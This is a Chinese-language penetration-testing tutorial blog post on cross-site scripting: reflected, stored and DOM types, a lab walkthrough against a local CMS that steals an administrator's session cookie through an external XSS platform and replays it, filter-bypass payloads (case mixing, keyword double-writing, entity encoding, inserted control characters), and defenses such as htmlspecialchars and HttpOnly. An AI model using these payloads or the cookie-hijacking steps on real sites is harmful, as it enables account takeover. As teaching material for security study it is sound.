跨站脚本攻击(XSS)

渗透测试漏洞原理

1. 跨站脚本攻击

1.1 漏洞概述

​ 跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。

​ 跨站脚本攻击,XSS(Cross Site Scripting)。由于与CSS(Cascading Style Sheet)重名,所以就更名为XSS。

​ XSS作为OWASP TOP10(2017)内容之一,主要使用JavaScript来完成恶意攻击的行为,JS可以非常灵活的操作HTML、CSS、浏览器,这就使得XSS攻击“想象”空间非常大。也就是说,JS强大的灵活性和功能,为XSS攻击提供了非常广阔的攻击面。

1.2 XSS漏洞原理

1.2.1 攻击模型

​ XSS通过将精心构造的代码(JavaScript)注入到网页中,并由浏览器解释运行这段JS代码,以达到恶意攻击的效果。当用户访问被XSS脚本注入过的网页,XSS脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。

整个XSS攻击过程,涉及三个角色:

  • 服务器
  • 攻击者
  • 客户端浏览器用户(前端)

注意

  • 搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险。

  • 等待受害者访问被注入恶意代码的页面,很被动,盲打。

  • XSS攻击目标是客户端浏览器用户,由于浏览器的类别不同,攻击效果不同,甚至于同一款浏览器,攻击效果都不一样。

1.3 XSS漏洞危害

XSS是利用JS代码实现攻击,有很多危害:

  • 盗取各种用户账号。
  • 窃取用户Cookie资料,冒充用户身份进入网站。
  • 劫持用户会话执行任意操作。
  • 刷流量,执行弹窗广告。
  • 传播蠕虫病毒。

1.4 XSS漏洞验证

可以使用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做POC(Proof of Concept)。验证XSS漏洞存在的POC如下:

<script>alert(/xss/);</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>

如果页面弹窗,浏览器把用户提交的字符串当做JS 来执行,并且执行成功,说明XSS 漏洞存在。

1.5 XSS漏洞分类

  • 反射型XSS

  • 存储型XSS

  • DOM 型XSS

1.5.1 反射型XSS

非持久性、参数型的跨站脚本。反射型XSS的代码在Wb应用的参数中,例如搜索框的反射型XSS。

注意到,反射型XSS代码出现在keywords参数中。

http://192.168.188.183/cms/search.php? keywords=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&button=%E6%90%9C%E7%B4%A2

容易被发现,利用难度高,很多漏洞提交平台不收反射型XSS漏洞。

1.5.2 存储型XSS

持久性跨站脚本。持久性体现在XSS代码不是在某个参数(变量)中,而是写进数据库或文件等可以永久保存数据的介质中。存储型XSS通常发生在留言板等地方,可以在留言板位置进行留言,将恶意代码写进数据库中。

危害面比较广,漏洞提交平台会接收此类漏洞。

1.5.3 DOM型XSS

DOM型XSS是一种XSS攻击,其中攻击的代码是由于修改受害者浏览器页面的DOM树而执行的。特殊的地方就是攻击代码(payload)在浏览器本地修改DOM树而执行,并不会将payload上传到服务器,这也使得DOM型XSS比较难以检测。

http://192.168.188.183/xss_test/DOM-XSS/?message=%3Cscript%3Ealert(/xss/)%3C/script%3E 

http://192.168.188.183/xss_test/DOM-XSS/#message=%3Cscript%3Ealert(/xss/)%3C/script%3E

注意:

  • 修改DOM 树执行;

  • 采用# 号的方式,参数不会提交到服务器。

2. XSS 攻防案例

XSS平台 https://xss.pt/

在XSS网站上使用该攻击代码

image-20230825103926930

在浏览器中查看该代码

image-20230825110540234

然后在cms网站的留言板功能处,输入我们的攻击代码

image-20230825110727913

管理员登录后台后进行留言管理。我们刚刚留言内容成功输入到了后台。

image-20230825110829010

返回xss平台,进行查看

image-20230825104039346

Cookie 欺骗

在浏览器页面点击F12,在控制台输入如下代码

document.cookie
document.cookie= "username=admin";
document.cookie= "userid=1";
document.cookie= "PHPSESSID=oa9ltlmjirk2s5pk27ndpkug91";

image-20230825104512920

然后在cms的后台登录界面的admin目录,刷新页面,之后就可以无需密码直接就可以登录。

image-20230825105025021

image-20230825111332363

2.1 固定会话

2.1.1 原理

用户会话令牌利用Cookie 来实现的,Cookie 是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险。可以利用XSS 攻击窃取到浏览器里的Cookie 信息。

由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。

XSS平台:https://xss.pt/

2.1.2 窃取

username=admin; userid=1; PHPSESSID=b09m2i6ppthmqqg26no26co6m3

2.1.3 欺骗

document.cookie = 'username=admin'; document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=b09m2i6ppthmqqg26no26co6m3';

2.1.4 影响

  • 黑客可以利用Cookie 信息,也就是身份凭据,登录后台。
  • 即使管理员注销登录,会话依然有效。
  • 即使管理员修改了密码,会话依然有效。

2.1.5 防御

  • 根据实际情况采用“单点登录”。
  • 采用Session 机制。
  • 设置token 值。
  • 对Cookie 数据,设置HttpOnly 属性。
HTTP/1.1 200 OK
Date: Mon, 23 Nov 2020 02:16:57 GMT 
Server: Apache
X-Powered-By: PHP/5.6.40
Set-Cookie: username=AJEST; expires=Mon, 23-Nov-2020 03:16:57 GMT; Max-Age=3600; path=/; domain=localhost; httponly
Content-Length: 0
Keep-Alive: timeout=5, max=100 
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

3. XSS 攻防

3.1 XSS 构造方法

3.1.1 利用<>

利用<>构造关键字

<img src = "图片链接路径" />

<script>alert(/xss/)</script>

<a href = "链接路径" >click me!</a>

3.1.2 javascript 伪协议

可以通过URL 载入资源的标签。

<a href = "javascript:alert(/xss/)">click me!</a>

<img src = "javascript:alert(/xss/)">	<!-- IE6 --> 有局限性

XSS 攻击的是浏览器,受前端影响比较大。浏览器的类型,版本等因素都会影响XSS 的效果。

3.1.3 事件响应

“事件驱动”是一种比较典型的编程思想。

事件类型说明
window 事件对window 对象触发的事件
Form 事件HTML 表单内触发的事件
Keyboard 事件键盘事件
Mouse 事件鼠标事件
Media 事件由多媒体触发的事件
<img src = "图片链接路径" />

<img onmouseover = 'alert(/dont touch me!/)' src = "图片链接路径" />

<img onmouseover = 'alert(/dont touch me!/)' src = "#" />

<input type = 'text' onkeydown = 'alert(/xss/)'>
<input type = 'text' onkeyup = 'alert(/xss/)'>

onmouseover:鼠标悬停事件。

onkeydown:在用户按下一个按键时执行事件。

onkeyup:当用户释放键盘按钮执行事件。

onclick:鼠标单击事件。

参考:HTML 事件

例如:

<a href = "https://pic3.zhimg.com/v2-55ee6ae7a4103bad5262fbaaad5409be_r.jpg"  onclick = 'alert(/wuhu/)'>click me!</a>

3.1.4 其他标签

<svg onload='alert(/xss/)'>
    
<input onfocus=alert(/xss/) autofocus>

3.1.5 参考

Cross-Site Scripting (XSS) Cheat Sheet - 2023 Edition | Web Security Academy (portswigger.net)

3.2 XSS 变形方式

cms 网站搜索框存在反射性XSS 漏洞,POC 如下:

<script>alert(/xss/)</script>

尝试在代码角度,对XSS 漏洞进行修复:修改 /cms/search.php 文件,对 $_GET[‘keywords’] 进行过滤,代码如下:

$keyword = $_GET['keywords'];

//将<script>替换为空
// $keyword = str_replace("<script>", "", $keyword);

//忽略大小写
// $keyword = preg_replace("/<script>/i", "", $keyword);	

//正则匹配过滤
//(.*):表示任意字符过滤。
$keyword = preg_replace("/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t>/i", "", $keyword);	

//过滤事件
// $keyword = str_replace("on", "o_n", $keyword);

//过滤大小写。例如:ONclick
$keyword = preg_replace("/on/i", "o_n", $keyword);

//过滤左尖括号
// $keyword = str_replace("<", "", $keyword);

//过滤右尖括号
// $keyword = str_replace(">", "", $keyword);

//
$keyword = htmlspecialchars($keyword);

echo $keyword;

image-20230825154416025

htmlspecialchars(string): 把预定义的字符: “<” (小于)、 “>” (大于)、& 、‘’、“” 转换为HTML实体,防止浏览器将其作为HTML元素。

impossible级别的代码先判断name是否为空,不为空的话然后验证其token,来防范CSRF攻击。然后再用htmlspecialchars函数将name中的预定义字符 “<” (小于)和 “>” (大于)转换成html实体,这样就防止了填入标签。

htmlspecialchars()的作用就是把预定义的字符转换为了HTML实体。预定义的字符如下:

& 成为 &amp
" 成为 &quot
' 成为 &#039
< 成为 &lt
> 成为 &gt

3.2.1 大小写转换

浏览器对HTML 标签大小写不敏感。

<ScRiPt>alert(/xss/)</script>
<img ONerror = 'alert(/xss/)' src = "#">

3.2.2 关键字双写

绕过一次过滤。

<scr<script>ipt>alert(/xss/)</script>

3.2.3 对伪协议进行转码

HTML 编码:

字母ASCII十进制编码十六进制编码
a97aa
c99cc
e101ee
//十六进制编码
<a 
href = '&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(/xss/) '>click me!</a>

//十进制
<a 
href = '&#106;&#97;&#118;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(/xss/) '>click me!</a>

其他编码:

  • utf-8 编码
  • utf-7 编码

3.2.4 插入其他字符

可以将以下字符插入到任意位置

字符编码
Tab&#9;
换行&#10;
回车&#13;
<a href = 'j&#9;avasc&#10;r&#13;ipt:alert(/xss/)'>click me!</a>

将以下字符插入到头部位置。

字符编码
SOH&#01;
STX&#02;
<a href = '&#01;&#02;j&#9;avasc&#10;r&#13;ipt:alert(/xss/)'>click me!</a>

3.2.5 引号的使用

HTML 语言对引号的使用要求不严格

  • 没有引号

  • 单引号

  • 双引号

<Img sRc=# OnErRoR=alert(/xss/);>
<Img sRc = '#' OnErRoR='alert(/xss/)'>
<Img sRc = "#" OnErRoR="alert(/xss/)">

3.2.6 /代替空格

<Img/sRc='#'/OnErRoR='alert(/xss/)'>

3.2.7 .拆分跨站

将一段JS 代码拆成多段。

<script>z='alert'</script>
<script>z+='(/xss/)'</script>
<script>eval(z)</script>

<script>eval(alert(/xss/))</script>

3.3 XSS 的防御

XSS 过滤器的作用是过滤用户(浏览器客户端)提交的有害信息,从而达到防范XSS 攻击的效果。

3.3.1 黑白名单策略

不管是采用输入过滤还是输出编码,都是针对用户提交的信息进行黑、白名单式的过滤:

  • 黑名单:非允许的内容

  • 白名单:允许的内容

3.3.2 输入过滤

永远不要相信用户的输入。

输入验证:对用户提交的信息进行“有效性”验证。

  • 仅接受指定长度。

  • 仅包含合法字符。

  • 仅接收指定范围。

  • 特殊的格式,例如,email、IP 地址。

数据消毒:过滤或净化掉有害的输入。

<?php
    // echo $_GET['keywords'];

    $keywords = $_GET['keywords'];
    $keywords = strtolower($keywords);
    $keywords = str_replace("on", "", $keywords);
    $keywords = str_replace("<script>", "", $keywords);
    $keywords = str_replace("<", "", $keywords);
    $keywords = str_replace(">", "", $keywords); echo $keywords;
?>

3.3.3 输出编码

HTML 编码是HTML 实体编码。

$keywords = htmlspecialchars( $_GET[ 'keywords' ] );

3.3.4 防御DOM型XSS

避免客户端文档重写,重定向或其他敏感操作。

3.3.5 终极测试代码

<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

4. 靶场练习

靶场地址:All labs | Web Security Academy (portswigger.net)

words = str_replace(“




### 3.3.3 输出编码

HTML 编码是HTML 实体编码。

```php
$keywords = htmlspecialchars( $_GET[ 'keywords' ] );

3.3.4 防御DOM型XSS

避免客户端文档重写,重定向或其他敏感操作。

3.3.5 终极测试代码

<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

4. 靶场练习

靶场地址:All labs | Web Security Academy (portswigger.net)

  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值